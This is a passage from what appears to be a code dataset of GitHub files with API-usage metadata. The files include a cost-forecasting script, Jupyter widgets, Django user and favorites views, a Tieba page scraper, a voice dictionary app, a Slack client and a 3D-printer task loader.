37, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.FileStorage_WRITE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "74062761767", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\nimport pandas \nimport glob\nimport sys \nimport matplotlib.pyplot as plt\nfrom utils import find_column_indices, parse_date, MAPE\nfrom beta_static import beta_static_lookup \n\ndata_file = sys.argv[1]\ndfs = pandas.read_excel(f'data/{data_file}.xlsx', sheet_name=None,\n skiprows=1)\nsheetnames = list(dfs.keys())\n\nimport numpy as np\n\n\nimport os \nif not os.path.isdir(\"data\"):\n os.makedirs(\"data\")\nbaselines = dfs['Baseline Schedule'][['ID', 'Duration', 'Total Cost']].values\nbaselines[:,1] = [parse_date(x) for x in baselines[:,1]]\n# planned duration\nBAC = baselines[0,2]\ntracking_periods = [x for x in sheetnames if \"TP\" in x]\nn_tracking_periods = baselines[0,1] / (20*60)\nprint(\"BAC:\", BAC)\nprint(\"Number of tracking periods:\", n_tracking_periods)\n\ndef cost_forecasting_evm():\n # Col 0 = ID, col 12 = Duration\n beta = beta_static_lookup[data_file] \n ACs = [0] # init AT0 = 0\n EVs = [0]\n EAC_costs = [] # predict project duration\n start_test = False\n t = 1\n for period in tracking_periods:\n print(\"Tracking periods:\", period)\n cols = find_column_indices(dfs[period].values[1], [\"ID\", \"Actual Cost\", \"Earned Value (EV)\", \"Planned Value (PV)\"])\n data_period = dfs[period].values[2:, cols] \n assert (baselines[:,0] == data_period[:,0]).sum() == len(baselines), \"Wrong permutation!\"\n\n AC = data_period[0, 1]\n ACs.append(AC)\n EV = data_period[0, 2]\n PV = data_period[0, 3]\n if t >= (len(tracking_periods)*2/3):\n # if True:\n CPI = EV/AC\n EAC = (BAC-EV) / CPI + AC\n print(\"Predict EAC:\", EAC)\n EAC_costs.append(EAC)\n t+=1\n print(\"Project actual costs: \", data_period[0,1])\n mape, error = MAPE([ACs[-1]]*len(EAC_costs[:-1]), EAC_costs[:-1])\n print(\"EVM MAPE: \", mape)\n return error, mape\n\n\nif __name__ == '__main__':\n if not os.path.isdir(\"figures\"):\n os.makedirs(\"figures\")\n fp = open(f\"logs/costs/{data_file}.log\", \"w+\")\n fp.write(f\"Dataset\\tDynamic\\n\")\n error_static, mape = cost_forecasting_evm()\n fp.write(f\"{data_file}\\t{mape:.2f}\\n\")\n", "repo_name": "LeDinhPhuc/XSM_09", "sub_path": "costs-evm.py", "file_name": "costs-evm.py", "file_ext": "py", "file_size_in_byte": 2162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.parse_date", "line_number": 24, "usage_type": "call"}, {"api_name": "beta_static.beta_static_lookup", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.find_column_indices", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.MAPE", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "70315686887", "text": "from ipywidgets import widgets\nimport IPython\nfrom IPython.core.display import display\nfrom typing import List\n\n\nclass InteractiveDiagram:\n \"\"\"A dropdown widget wrapper\"\"\"\n def __init__(self, diagram_renderer, choices, description):\n def get_default_choice_key():\n return list(self.choices.keys())[0]\n\n def get_default_choice_value():\n val = list(self.choices.values())[0]\n if not isinstance(val, list) and not isinstance(val, tuple):\n return (val,)\n return val\n\n self.diagram_renderer = diagram_renderer\n self.choices = choices\n\n display(get_default_choice_key())\n\n self.choice_widget = widgets.Dropdown(\n options=self.choices.keys(),\n value=get_default_choice_key(),\n description=description,\n disabled=False,\n )\n dropdown_state_eventhandler = lambda change: self.dropdown_state_eventhandler(change)\n self.choice_widget.observe(dropdown_state_eventhandler, names='value')\n self._render(get_default_choice_key(), get_default_choice_value())\n\n def _render(self, choice, values):\n IPython.display.clear_output(wait=True)\n display(self.choice_widget)\n self.diagram_renderer(choice, *values)\n\n def dropdown_state_eventhandler(self, change):\n state_choice = change.new\n values = self.choices[state_choice]\n if not isinstance(values, list) and not isinstance(values, tuple):\n values = (values,)\n self._render(state_choice, values)\n\n\nclass InteractiveDiagram_2:\n \"\"\"A dropdown widget wrapper\"\"\"\n def __init__(self, choices: List, description: str):\n def get_default_choice():\n return list(self.choices.keys())[0]\n\n def get_default_renderer():\n val = list(self.choices.values())[0]\n return val\n\n self.choices = choices\n display(get_default_choice())\n\n self.choice_widget = widgets.Dropdown(\n options=self.choices.keys(),\n value=get_default_choice(),\n description=description,\n disabled=False,\n )\n dropdown_state_eventhandler = lambda change: self.dropdown_state_eventhandler(change)\n self.choice_widget.observe(dropdown_state_eventhandler, names='value')\n self._render(get_default_choice(), get_default_renderer())\n\n def _render(self, title, renderer):\n IPython.display.clear_output(wait=True)\n display(self.choice_widget)\n renderer(title=title)\n\n def dropdown_state_eventhandler(self, change):\n state_choice = change.new\n renderer = self.choices[state_choice]\n self._render(state_choice, renderer)\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/experimental/trt-engine-explorer/trex/interactive.py", "file_name": "interactive.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "IPython.core.display.display", "line_number": 22, "usage_type": "call"}, {"api_name": "ipywidgets.widgets.Dropdown", "line_number": 24, "usage_type": "call"}, {"api_name": "ipywidgets.widgets", "line_number": 24, "usage_type": "name"}, {"api_name": "IPython.display.clear_output", "line_number": 35, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 35, "usage_type": "attribute"}, {"api_name": "IPython.core.display.display", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "IPython.core.display.display", "line_number": 58, "usage_type": "call"}, {"api_name": "ipywidgets.widgets.Dropdown", "line_number": 60, "usage_type": "call"}, {"api_name": "ipywidgets.widgets", "line_number": 60, "usage_type": "name"}, 
{"api_name": "IPython.display.clear_output", "line_number": 71, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 71, "usage_type": "attribute"}, {"api_name": "IPython.core.display.display", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "32922066620", "text": "from django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom manga.models import Manga\n\nfrom users.models import Favorite\nfrom users.serializers import UserSerializer, UserSerializerWithToken, FavoriteSerializer\n\n# Create your views here.\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import status\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n def validate(self, attrs):\n data = super().validate(attrs)\n\n serializer = UserSerializerWithToken(self.user).data\n for k, v in serializer.items():\n data[k] = v\n\n return data\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\n# ----------------------------\n# Guest\n# ----------------------------\n\n\n@api_view(['POST'])\ndef registerUser(request):\n data = request.data\n try:\n user = User.objects.create(\n first_name=data['name'],\n username=data['email'],\n email=data['email'],\n password=make_password(data['password'])\n )\n\n serializer = UserSerializerWithToken(user, many=False)\n return Response(serializer.data)\n except:\n message = {'detail': 'User with this email already exists'}\n return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n# ----------------------------\n# User\n# ----------------------------\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUserProfile(request):\n try:\n user = request.user\n serializer = UserSerializerWithToken(user, many=False)\n\n data = request.data\n user.first_name = data['name']\n user.username = data['email']\n user.email = data['email']\n\n if data['password'] != '':\n user.password = make_password(data['password'])\n\n user.save()\n\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getUserProfile(request):\n try:\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef handleFavorite(request, pk):\n try:\n user = request.user\n\n manga = Manga.objects.get(_id=pk)\n\n favorite = Favorite.objects.filter(Q(manga=manga) & Q(user=user))\n\n if (favorite):\n favorite.delete()\n manga.favorites -= 1\n manga.save()\n\n return Response('Favorite was deleted')\n else:\n createdFavorite = Favorite.objects.create(\n user=user,\n manga=manga\n )\n\n manga.favorites += 1\n manga.save()\n serializer = FavoriteSerializer(createdFavorite, many=False)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getMyFavorites(request):\n try:\n user = request.user\n favorites = user.favorite_set.all()\n serializer = FavoriteSerializer(favorites, many=True)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, 
status=status.HTTP_204_NO_CONTENT)\n", "repo_name": "Ren0503/mangaka-py-read-comic", "sub_path": "server/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 21, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.make_password", "line_number": 49, "usage_type": "call"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 56, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 56, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 41, "usage_type": "call"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.hashers.make_password", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 81, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 83, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 65, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 65, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 92, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 94, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 94, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 87, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 87, "usage_type": "name"}, {"api_name": "manga.models", "line_number": 103, "usage_type": "name"}, {"api_name": "manga.models.Manga.objects.get", "line_number": 103, "usage_type": "call"}, {"api_name": "manga.models.Manga.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "manga.models.Manga", "line_number": 103, "usage_type": "name"}, 
{"api_name": "users.models.Favorite.objects.filter", "line_number": 105, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "users.models.Favorite", "line_number": 105, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 105, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 105, "usage_type": "name"}, {"api_name": "manga.models.favorites", "line_number": 109, "usage_type": "attribute"}, {"api_name": "manga.models", "line_number": 109, "usage_type": "name"}, {"api_name": "manga.models.save", "line_number": 110, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 110, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects.create", "line_number": 114, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects", "line_number": 114, "usage_type": "attribute"}, {"api_name": "users.models.Favorite", "line_number": 114, "usage_type": "name"}, {"api_name": "manga.models", "line_number": 116, "usage_type": "name"}, {"api_name": "manga.models.favorites", "line_number": 119, "usage_type": "attribute"}, {"api_name": "manga.models", "line_number": 119, "usage_type": "name"}, {"api_name": "manga.models.save", "line_number": 120, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 120, "usage_type": "name"}, {"api_name": "users.serializers.FavoriteSerializer", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 122, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 98, "usage_type": "name"}, {"api_name": "users.serializers.FavoriteSerializer", "line_number": 133, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 134, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 136, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 128, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 128, "usage_type": "name"}]}
+{"seq_id": "28596191580", "text": "from urllib.request import Request, urlopen\nfrom urllib.parse import urlencode\nfrom fake_useragent import UserAgent\n\nCONTENT = \"抗压背锅\"\nPN_PAGE = 3\n\ndef getting_page(url):\n headers = {\n 'user-agent': UserAgent().random\n }\n\n # 封装请求头\n request = Request(url, headers=headers)\n\n # 发送请求\n response = urlopen(request)\n\n return response.read() # 返回\n\n\n\n\n\n\ndef save_page(page_bytes, pn):\n with open(\"./\"+CONTENT+\"_\"+str(pn), 'wb') as f:\n f.write(page_bytes) # 以字节形式写入。\n\n\ndef main() -> None:\n # 准备url:\n raw_url = \"https://tieba.baidu.com/f?{}\"\n for pn in range(PN_PAGE):\n args = {\n 'kw': CONTENT,\n 'ie': 'utf-8',\n 'pn': pn * 50 # 观察URL页面规律\n }\n\n url = raw_url.format(urlencode(args))\n page_bytes = getting_page(url)\n # 保存\n save_page(page_bytes, pn) #\n\n\n\n\nif __name__ == '__main__':\n main()", "repo_name": "WakingHours-GitHub/PythonSpider", "sub_path": "1_urllib的使用/5_贴吧案例.py", "file_name": "5_贴吧案例.py", "file_ext": "py", "file_size_in_byte": 968, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "1362365274", "text": "# this is about creating a dictionary in python using the given data.\n\nimport json\nfrom difflib import get_close_matches\nimport speech_recognition as sr\n\ndata = json.load(open(\"data.json\"))\n\n# take word as voice input from user.\ndef word_voice_find():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n audio = r.listen(source)\n try:\n word = r.recognize_google(audio)\n word = word.lower()\n uword = word.title()\n if word in data:\n for i in data[word]:\n print(word+\" means \"+i)\n elif uword in data:\n for i in data[uword]:\n print(uword+\" means \"+i)\n else:\n poss = get_close_matches(word,data.keys(),1,0.8)\n if len(poss) == 0:\n print(\"Well is that even a word!\")\n else:\n for i in data[poss[0]]:\n print(poss[0]+\" means \"+i)\n except sr.UnknownValueError:\n print(\"We couldn't get what you are trying to say!\")\n except sr.RequestError as e:\n print(\"Sphinx error; {0}\".format(e))\n# take word as input from user\ndef word_keyboard_find():\n print(\"\\n\")\n word = input(\"Enter a word: \")\n word = word.lower()\n uword = word.title()\n if word in data:\n for i in data[word]:\n print(i)\n elif uword in data:\n for i in data[uword]:\n print(i)\n else:\n poss = get_close_matches(word,data.keys())\n if len(poss) > 0:\n print(\"It seems you have misspelled\")\n for i in poss:\n print(i)\n ch = input(\"Enter Y/N: \")\n if ch == 'y':\n word_find()\n else:\n print(\"Well is \"+word+\" even a word?\")\n\n# take user's choice either voice or traditional input.\n\nchoice = input(\"Great! So how are you planning to use this app?\"+\n\"\\n press 1 for keyboard input\"+\n\"\\n press 2 for voice input\")\n\nif choice == '1':\n word_keyboard_find()\nelif choice == '2':\n word_voice_find()\nelse:\n print(\"I guess you have made a wrong choice! You need to start over again\")\n", "repo_name": "shivank-awasthi/PythonDictionary", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 11, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 12, "usage_type": "call"}, {"api_name": "difflib.get_close_matches", "line_number": 26, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 34, "usage_type": "attribute"}, {"api_name": "difflib.get_close_matches", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "17789931612", "text": "# coding: UTF-8\nfrom apps.logger import AppLogger\nfrom slackweb import Slack\nfrom urllib.error import HTTPError, URLError\n\n\nclass SlackClient:\n\n slack: Slack\n\n def __init__(self, url: str):\n self.slack = Slack(url=url)\n\n def post(self, message):\n\n logger = AppLogger.get_logger(__name__)\n\n try:\n self.slack.notify(text=message)\n\n except HTTPError as error:\n logger.error('Error code: %s' % error.code)\n\n except URLError as error:\n logger.error('Reason: %s' % error.reason)\n", "repo_name": "blendthink/weather_forecast", "sub_path": "infras/clients/slack_client.py", "file_name": "slack_client.py", "file_ext": "py", "file_size_in_byte": 550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "slackweb.Slack", "line_number": 9, "usage_type": "name"}, {"api_name": "slackweb.Slack", "line_number": 12, "usage_type": "call"}, {"api_name": "apps.logger.AppLogger.get_logger", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.logger.AppLogger", "line_number": 16, "usage_type": "name"}, {"api_name": "urllib.error.HTTPError", "line_number": 21, "usage_type": "name"}, {"api_name": "urllib.error.URLError", "line_number": 24, "usage_type": "name"}]}
+{"seq_id": "1239981035", "text": "import matplotlib.ticker as ticker\nimport matplotlib.pyplot as plt\nfrom evaluation import evaluate\n\ndef showAttention(input_sentence, output_words, attentions):\n # Set up figure with colorbar\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(attentions.numpy(), cmap='bone')\n fig.colorbar(cax)\n\n # Set up axes\n ax.set_xticklabels([''] + input_sentence.split(' ') +\n [''], rotation=90)\n ax.set_yticklabels([''] + output_words)\n\n # Show label at every tick\n ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n\n plt.show()\n\n\ndef evaluateAndShowAttention(input_lang, output_lang, encoder1, attn_decoder1, input_sentence,):\n output_words, attentions = evaluate(input_lang, output_lang, encoder1, attn_decoder1, input_sentence)\n print('input =', input_sentence)\n print('output =', ' '.join(output_words))\n showAttention(input_sentence, output_words, attentions)", "repo_name": "Remomare/seq2seq_Translation_WMT16", "sub_path": "attn_visualizing.py", "file_name": "attn_visualizing.py", "file_ext": "py", "file_size_in_byte": 1003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "evaluation.evaluate", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "26503229007", "text": "\nfrom multiprocessing import Process\nfrom zipfile import crc32\nfrom shutil import copyfile\nfrom select import select\nfrom time import time\nimport logging\nimport struct\nimport socket\nimport os\n\nfrom setproctitle import setproctitle\n\nfrom fluxmonitor.err_codes import FILE_BROKEN, NOT_SUPPORT\nfrom fluxmonitor.storage import UserSpace\n\n# G0_G1_CMD_PARSER = re.compile(\"G[0-1]( F(?P[0-9]+))?( X(?P[\\-0-9.]+))?\"\n# \"( Y(?P[\\-0-9.]+))?( Z(?P[\\-0-9.]+))?\"\n# \"( E(?P[\\-0-9.]+))?( F(?P[0-9]+))?\")\n# G28_PARSER = re.compile(\"(^G28|\\ G28)(\\ |$)\")\n# T_PARSER = re.compile(\"(^T\\d|\\ T\\d)(\\ |$)\")\n\nlogger = logging.getLogger(\"TaskLoader\")\nINT_PACKER = struct.Struct(\"= 5:\n space.rm(\"SD\", name)\n else:\n place_file(syntax, index + 1)\n space.mv(\"SD\", name, syntax % (index + 1))\n\n place_file(\"Recent/recent-%i.fc\", 1)\n if use_swap:\n space.mv(\"SD\", \"Recent/swap.fc\", \"Recent/recent-1.fc\")\n elif space.in_entry(\"SD\", filename):\n os.link(filename,\n space.get_path(\"SD\", \"Recent/recent-1.fc\"))\n else:\n copyfile(filename,\n space.get_path(\"SD\", \"Recent/recent-1.fc\"))\n os.system(\"sync\")\n\n\nclass TaskLoader(Process):\n \"\"\"\n Useable property:\n loader.fileno() - Endpoint to read stream data\n loader.close() - Close io and subprocess\n loader.script_size - Entire script size (bytes)\n loader.io_progress - Script alread readed (bytes)\n loader.metadata - Dict store metadata in file\n \"\"\"\n\n def _load(self, task_file, crc_check):\n t = task_file\n\n # Check header\n magic_num = t.read(8)\n if magic_num != b\"FCx0001\\n\":\n if magic_num[:3] != b\"FCx\" or magic_num[3:].isdigit() is False:\n raise RuntimeError(FILE_BROKEN)\n else:\n ver = int(magic_num[3:])\n raise RuntimeError(FILE_BROKEN, NOT_SUPPORT, str(ver))\n\n # Check script\n script_size = UINT_PACKER.unpack(t.read(4))[0]\n self.script_ptr = t.tell()\n self.script_size = script_size\n\n if crc_check:\n script_crc32 = 0\n f_ptr = 0\n while f_ptr < script_size:\n buf = t.read(min(script_size - f_ptr, 4096))\n if buf:\n f_ptr += len(buf)\n script_crc32 = crc32(buf, script_crc32)\n else:\n raise RuntimeError(FILE_BROKEN, \"LENGTH_ERROR\")\n\n req_script_crc32 = INT_PACKER.unpack(t.read(4))[0]\n if req_script_crc32 != script_crc32:\n raise RuntimeError(FILE_BROKEN, \"SCRIPT_CRC32\")\n else:\n t.seek(script_size + 4, 1)\n\n # Check meta\n meta_size = UINT_PACKER.unpack(t.read(4))[0]\n meta_buf = t.read(meta_size)\n req_metadata_crc32 = INT_PACKER.unpack(t.read(4))[0]\n if crc_check and req_metadata_crc32 != crc32(meta_buf, 0):\n raise RuntimeError(FILE_BROKEN, \"METADATA_CRC32\")\n\n metadata = {}\n for item in meta_buf.split(\"\\x00\"):\n sitem = item.split(\"=\", 1)\n if len(sitem) == 2:\n metadata[sitem[0]] = sitem[1]\n self.metadata = metadata\n\n t.seek(self.script_ptr)\n\n def __init__(self, task_file, crc_check=True):\n self._load(task_file, crc_check)\n self.task_file = task_file\n\n self.io_in, self.io_out = socket.socketpair()\n\n super(TaskLoader, self).__init__(target=self.__serve_forever)\n self.daemon = True\n self.start()\n\n self.fout = self.io_out.makefile(\"rb\", -1)\n\n # Remember to close after forked !!\n self.io_in.close()\n del self.io_in\n\n @property\n def io_progress(self):\n return self.task_file.tell() - 12\n\n def __serve_forever(self):\n setproctitle(\"fluxplayer: TaskLoader\")\n logger.debug(\"TaskLoader forked\")\n\n self.io_out.close()\n del self.io_out\n\n try:\n readed = 0\n buf = bytearray(4096)\n view = 
memoryview(buf)\n\n            while readed < self.script_size:\n                l = self.task_file.readinto(buf)\n                if l == 0:\n                    # EOF\n                    return\n                elif readed + l < self.script_size:\n                    readed += l\n                else:\n                    l = self.script_size - readed\n                    readed = self.script_size\n\n                offset = 0\n                while offset < l:\n                    rl, wl, _ = select((self.io_in, ), (self.io_in, ), (), 3.0)\n                    if rl:\n                        # Remote should not send anything, close socket\n                        # directly\n                        return\n                    if wl:\n                        offset += self.io_in.send(view[offset:l])\n\n            logger.debug(\"TaskLoader close normally\")\n        except KeyboardInterrupt:\n            pass\n        except Exception:\n            logger.exception(\"TaskLoader close with error\")\n\n        finally:\n            self.io_in.shutdown(socket.SHUT_WR)\n            t = time()\n            while not select((self.io_in, ), (), (), 3)[0]:\n                # Wait for remote close socket\n                if time() - t > 28800:\n                    # if we wait for more than 8 hours, interrupt it.\n                    break\n            self.io_in.close()\n\n    def fileno(self):\n        return self.fout.fileno()\n\n    def close(self):\n        self.io_out.close()\n        self.fout.close()\n        self.task_file.close()\n\n        if self.is_alive():\n            self.terminate()\n", "repo_name": "flux3dp/delta-firmware", "sub_path": "fluxmonitor/player/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 6368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 24, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 25, "usage_type": "call"}, {"api_name": "fluxmonitor.storage.UserSpace", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.link", "line_number": 54, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 59, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 62, "usage_type": "name"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 79, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 82, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.NOT_SUPPORT", "line_number": 82, "usage_type": "argument"}, {"api_name": "zipfile.crc32", "line_number": 96, "usage_type": "call"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 98, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 102, "usage_type": "argument"}, {"api_name": "zipfile.crc32", "line_number": 110, "usage_type": "call"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 111, "usage_type": "argument"}, {"api_name": "socket.socketpair", "line_number": 126, "usage_type": "call"}, {"api_name": "setproctitle.setproctitle", "line_number": 143, "usage_type": "call"}, {"api_name": "select.select", "line_number": 167, "usage_type": "call"}, {"api_name": "socket.SHUT_WR", "line_number": 182, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": 
